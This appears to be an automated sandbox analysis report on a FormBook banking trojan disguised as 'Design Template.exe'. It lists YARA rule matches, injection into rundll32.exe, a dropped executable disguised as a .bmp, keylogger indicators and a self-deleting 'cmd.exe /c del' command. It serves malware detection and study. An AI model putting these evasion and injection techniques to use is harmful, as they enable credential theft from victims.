Source: rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmp, strings found in binary or memory: https://fonts.googleapis.com/css2?family=Inter:wght, https://fonts.googleapis.com/css2?family=Montserrat:wght, https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css, https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css, https://twitter.com/onlydomains, https://www.onlydomains.com/hosting/?utm_medium=free_parking&utm_source=landreclaim.com, https://www.onlydomains.com?utm_medium=free_parking&utm_source=landreclaim.com, https://www.trustpilot.com/review/onlydomains.com (the domain-parking page served by decoy host landreclaim.com, still in rundll32.exe memory after the request; it is rundll32.exe, the injected host process, that performs the HTTP traffic)
Potential key logger detected (key state polling based)
Source: C:\Users\user\Desktop\Design Template.exe, Code function: 2_2_0042CCDA: GetKeyState, GetKeyState, GetKeyState, GetKeyState, SendMessageA
Source: C:\Users\user\Desktop\Design Template.exe, Code function: 2_2_0042E537: GetKeyState, GetKeyState, GetKeyState, GetKeyState

E-Banking Fraud:

Detected Osiris Trojan
Source: C:\Users\user\Desktop\Design Template.exe, File created: C:\Users\user\AppData\Local\Temp\Liebert.bmp
Yara detected FormBook
Source: Yara match, the same seven sources listed under AV Detection above (six memory dumps and the dropped C:\Users\user\AppData\Local\Temp\Liebert.bmp)

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, type: DROPPEDMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, type: DROPPEDMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 2_2_00434168 NtCreateFile, 2_2_00434168
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 2_2_0043816D NtTerminateProcess, 2_2_0043816D
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 2_2_0043A3B8 NtCreateFile, NtCreateSection, NtMapViewOfSection, 2_2_0043A3B8
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 2_2_0043A5B8 NtCreateFile, NtCreateSection, NtMapViewOfSection, NtClose, 2_2_0043A5B8
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 2_2_00434678 NtCreateFile, NtCreateSection, NtMapViewOfSection, NtClose, 2_2_00434678
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 2_2_004356B8 NtWriteFile, NtCreateSection, NtClose, 2_2_004356B8
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 2_2_00433FF8 NtAllocateVirtualMemory, 2_2_00433FF8
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 2_2_00434798 CreateProcessInternalW, NtQueryInformationProcess, NtUnmapViewOfSection, NtMapViewOfSection, NtGetContextThread, NtSetContextThread, NtWriteVirtualMemory, NtResumeThread, NtClose, NtFreeVirtualMemory, NtUnmapViewOfSection, 2_2_00434798
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 2_2_0043501A NtClose, NtFreeVirtualMemory, NtUnmapViewOfSection, 2_2_0043501A
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 2_2_00434D27 NtClose, NtFreeVirtualMemory, NtUnmapViewOfSection, 2_2_00434D27
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A498F0 NtReadVirtualMemory, LdrInitializeThunk, 4_2_00A498F0
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A49860 NtQuerySystemInformation, LdrInitializeThunk, 4_2_00A49860
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A49840 NtDelayExecution, LdrInitializeThunk, 4_2_00A49840
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A499A0 NtCreateSection, LdrInitializeThunk, 4_2_00A499A0
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A49910 NtAdjustPrivilegesToken, LdrInitializeThunk, 4_2_00A49910
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A49A20 NtResumeThread, LdrInitializeThunk, 4_2_00A49A20
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A49A00 NtProtectVirtualMemory, LdrInitializeThunk, 4_2_00A49A00
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A49A50 NtCreateFile, LdrInitializeThunk, 4_2_00A49A50
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A495D0 NtClose, LdrInitializeThunk, 4_2_00A495D0
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A49540 NtReadFile, LdrInitializeThunk, 4_2_00A49540
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A496E0 NtFreeVirtualMemory, LdrInitializeThunk, 4_2_00A496E0
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A49660 NtAllocateVirtualMemory, LdrInitializeThunk, 4_2_00A49660
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A497A0 NtUnmapViewOfSection, LdrInitializeThunk, 4_2_00A497A0
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A49780 NtMapViewOfSection, LdrInitializeThunk, 4_2_00A49780
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A49FE0 NtCreateMutant, LdrInitializeThunk, 4_2_00A49FE0
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A49710 NtQueryInformationToken, LdrInitializeThunk, 4_2_00A49710
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A498A0 NtWriteVirtualMemory, 4_2_00A498A0
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A49820 NtEnumerateKey, 4_2_00A49820
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A4B040 NtSuspendThread, 4_2_00A4B040
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A499D0 NtCreateProcessEx, 4_2_00A499D0
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A49950 NtQueueApcThread, 4_2_00A49950
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A49A80 NtOpenDirectoryObject, 4_2_00A49A80
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A49A10 NtQuerySection, 4_2_00A49A10
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A4A3B0 NtGetContextThread, 4_2_00A4A3B0
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A49B00 NtSetValueKey, 4_2_00A49B00
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A495F0 NtQueryInformationFile, 4_2_00A495F0
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A49520 NtWaitForSingleObject, 4_2_00A49520
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A4AD30 NtSetContextThread, 4_2_00A4AD30
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A49560 NtWriteFile, 4_2_00A49560
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A496D0 NtCreateKey, 4_2_00A496D0
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A49610 NtEnumerateValueKey, 4_2_00A49610
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A49670 NtQueryInformationProcess, 4_2_00A49670
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A49650 NtQueryValueKey, 4_2_00A49650
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A49730 NtQueryVirtualMemory, 4_2_00A49730
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A4A710 NtOpenProcessToken, 4_2_00A4A710
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A49760 NtOpenProcess, 4_2_00A49760
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A4A770 NtOpenThread, 4_2_00A4A770
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A49770 NtSetInformationFile, 4_2_00A49770
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044C9540 NtReadFile, LdrInitializeThunk, 14_2_044C9540
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044C95D0 NtClose, LdrInitializeThunk, 14_2_044C95D0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044C9650 NtQueryValueKey, LdrInitializeThunk, 14_2_044C9650
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044C9660 NtAllocateVirtualMemory, LdrInitializeThunk, 14_2_044C9660
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044C96D0 NtCreateKey, LdrInitializeThunk, 14_2_044C96D0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044C96E0 NtFreeVirtualMemory, LdrInitializeThunk, 14_2_044C96E0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044C9710 NtQueryInformationToken, LdrInitializeThunk, 14_2_044C9710
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044C9FE0 NtCreateMutant, LdrInitializeThunk, 14_2_044C9FE0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044C9780 NtMapViewOfSection, LdrInitializeThunk, 14_2_044C9780
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044C9840 NtDelayExecution, LdrInitializeThunk, 14_2_044C9840
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044C9860 NtQuerySystemInformation, LdrInitializeThunk, 14_2_044C9860
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044C9910 NtAdjustPrivilegesToken, LdrInitializeThunk, 14_2_044C9910
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044C99A0 NtCreateSection, LdrInitializeThunk, 14_2_044C99A0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044C9A50 NtCreateFile, LdrInitializeThunk, 14_2_044C9A50
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044C9560 NtWriteFile, 14_2_044C9560
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044C9520 NtWaitForSingleObject, 14_2_044C9520
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044CAD30 NtSetContextThread, 14_2_044CAD30
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044C95F0 NtQueryInformationFile, 14_2_044C95F0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044C9670 NtQueryInformationProcess, 14_2_044C9670
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044C9610 NtEnumerateValueKey, 14_2_044C9610
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044C9760 NtOpenProcess, 14_2_044C9760
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044CA770 NtOpenThread, 14_2_044CA770
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044C9770 NtSetInformationFile, 14_2_044C9770
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044CA710 NtOpenProcessToken, 14_2_044CA710
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044C9730 NtQueryVirtualMemory, 14_2_044C9730
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044C97A0 NtUnmapViewOfSection, 14_2_044C97A0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044CB040 NtSuspendThread, 14_2_044CB040
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044C9820 NtEnumerateKey, 14_2_044C9820
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044C98F0 NtReadVirtualMemory, 14_2_044C98F0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044C98A0 NtWriteVirtualMemory, 14_2_044C98A0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044C9950 NtQueueApcThread, 14_2_044C9950
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044C99D0 NtCreateProcessEx, 14_2_044C99D0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044C9A00 NtProtectVirtualMemory, 14_2_044C9A00
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044C9A10 NtQuerySection, 14_2_044C9A10
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044C9A20 NtResumeThread, 14_2_044C9A20
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044C9A80 NtOpenDirectoryObject, 14_2_044C9A80
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044C9B00 NtSetValueKey, 14_2_044C9B00
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044CA3B0 NtGetContextThread, 14_2_044CA3B0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_005081B0 NtCreateFile, 14_2_005081B0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_00508260 NtReadFile, 14_2_00508260
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_005082E0 NtClose, 14_2_005082E0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_00508390 NtAllocateVirtualMemory, 14_2_00508390
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_005081AA NtCreateFile, 14_2_005081AA
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_0050825B NtReadFile, 14_2_0050825B
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_005082DA NtClose, 14_2_005082DA
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_0050838A NtAllocateVirtualMemory, 14_2_0050838A
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 2_2_00434798 2_2_00434798
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 2_2_0042C063 2_2_0042C063
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 2_2_0042572C 2_2_0042572C
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 2_2_00429FD0 2_2_00429FD0
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A320A0 4_2_00A320A0
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00AD20A8 4_2_00AD20A8
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A1B090 4_2_00A1B090
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00AD28EC 4_2_00AD28EC
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00AC1002 4_2_00AC1002
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A24120 4_2_00A24120
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A0F900 4_2_00A0F900
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00AD22AE 4_2_00AD22AE
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A3EBB0 4_2_00A3EBB0
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00ACDBD2 4_2_00ACDBD2
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00AD2B28 4_2_00AD2B28
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A1841F 4_2_00A1841F
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00ACD466 4_2_00ACD466
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A32581 4_2_00A32581
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A1D5E0 4_2_00A1D5E0
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00AD25DD 4_2_00AD25DD
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A00D20 4_2_00A00D20
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00AD2D07 4_2_00AD2D07
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00AD1D55 4_2_00AD1D55
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00AD2EF7 4_2_00AD2EF7
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00A26E30 4_2_00A26E30
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00ACD616 4_2_00ACD616
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 4_2_00AD1FF1 4_2_00AD1FF1
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_0454D466 14_2_0454D466
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_0449841F 14_2_0449841F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_04551D55 14_2_04551D55
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_04552D07 14_2_04552D07
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_04480D20 14_2_04480D20
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_045525DD 14_2_045525DD
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_0449D5E0 14_2_0449D5E0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044B2581 14_2_044B2581
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_0454D616 14_2_0454D616
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044A6E30 14_2_044A6E30
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_04552EF7 14_2_04552EF7
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_04551FF1 14_2_04551FF1
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_04541002 14_2_04541002
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_045528EC 14_2_045528EC
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_0449B090 14_2_0449B090
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044B20A0 14_2_044B20A0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_045520A8 14_2_045520A8
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_0448F900 14_2_0448F900
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044A4120 14_2_044A4120
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_045522AE 14_2_045522AE
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_04552B28 14_2_04552B28
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_0454DBD2 14_2_0454DBD2
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_044BEBB0 14_2_044BEBB0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_0050C838 14_2_0050C838
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_004F8C4B 14_2_004F8C4B
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_004F8C50 14_2_004F8C50
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_004F2D90 14_2_004F2D90
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_004F2FB0 14_2_004F2FB0
Source: C:\Users\user\Desktop\Design Template.exe | Code function: String function: 00422DE8 appears 49 times
Source: C:\Users\user\Desktop\Design Template.exe | Code function: String function: 00A0B150 appears 35 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 0448B150 appears 35 times
Source: Liebert.bmp.2.dr | Static PE information: No import functions for PE file found
Source: Design Template.exe, 00000004.00000002.329749944.0000000002629000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameRUNDLL32.EXEj% vs Design Template.exe
Source: Design Template.exe, 00000004.00000002.329471350.0000000000C8F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Design Template.exe
Source: Design Template.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, type: DROPPED | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, type: DROPPED | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Liebert.bmp.2.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Liebert.bmp.2.dr | Static PE information: Section .text
Source: classification engine | Classification label: mal100.bank.troj.evad.winEXE@7/1@15/6
Source: C:\Users\user\Desktop\Design Template.exe | Code function: 2_2_0042D194 FindResourceA, LoadResource, LockResource, 2_2_0042D194
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7052:120:WilError_01
Source: C:\Users\user\Desktop\Design Template.exe | File created: C:\Users\user~1\AppData\Local\Temp\Liebert.bmp
Source: Design Template.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Design Template.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: Design Template.exe | Virustotal: Detection: 34%
Source: unknown | Process created: C:\Users\user\Desktop\Design Template.exe 'C:\Users\user\Desktop\Design Template.exe'
Source: C:\Users\user\Desktop\Design Template.exe | Process created: C:\Users\user\Desktop\Design Template.exe C:\Users\user\Desktop\Design Template.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Design Template.exe'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Design Template.exe | Process created: C:\Users\user\Desktop\Design Template.exe C:\Users\user\Desktop\Design Template.exe
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Design Template.exe'
Source: Design Template.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000007.00000000.308122026.000000000E6F0000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: Design Template.exe, 00000004.00000002.329265577.0000000000AFF000.00000040.00000001.sdmp, rundll32.exe, 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: Design Template.exe, rundll32.exe
Source: Binary string: rundll32.pdb | source: Design Template.exe, 00000004.00000002.329733496.0000000002620000.00000040.00000001.sdmp
